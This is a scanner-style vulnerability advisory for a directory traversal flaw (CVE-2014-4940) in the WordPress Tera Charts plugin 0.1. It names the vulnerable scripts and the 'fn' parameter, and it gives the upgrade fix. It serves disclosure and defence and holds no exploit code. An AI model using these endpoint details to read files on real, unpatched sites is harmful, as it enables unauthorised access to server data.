Wordpress Tera Charts Multiple Directory Traversal Vulnerability Network Vulnerability

Summary

This host is installed with Wordpress Tera Charts and is prone to multiple directory traversal vulnerability.

Impact

Successful exploitation will allow remote attackers to download arbitrary files. Impact Level: Application

Solution

Upgrade to version 1.0 or higher, For updates refer https://wordpress.org/plugins/tera-charts

Insight

Flaw is due to the 'charts/treemap.php' and 'charts/zoomabletreemap.php' scripts are not properly sanitizing user input, specifically path traversal style attacks (e.g. '../') via the 'fn' parameter.

Affected

Wordpress Tera Charts plugin version 0.1

Detection

Send a crafted data via HTTP GET request and check whether it is able to read arbitrary files or not.

References

http://www.osvdb.org/109028
http://www.osvdb.org/109029
https://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion

Updated on 2015-03-25

Severity

Classification

CVE CVE-2014-4940

CVSS	Base Score: 5.0 AV:N/AC:L/Au:N/C:P/I:N/A:N

Related Vulnerabilities

Apache Tiles Multiple XSS Vulnerability
Andromeda Streaming MP3 Server Cross Site Scripting Vulnerability
Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
APC PowerChute Network Shutdown 'security/applet' Cross Site Scripting Vulnerability
Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability

Take action and discover your vulnerabilities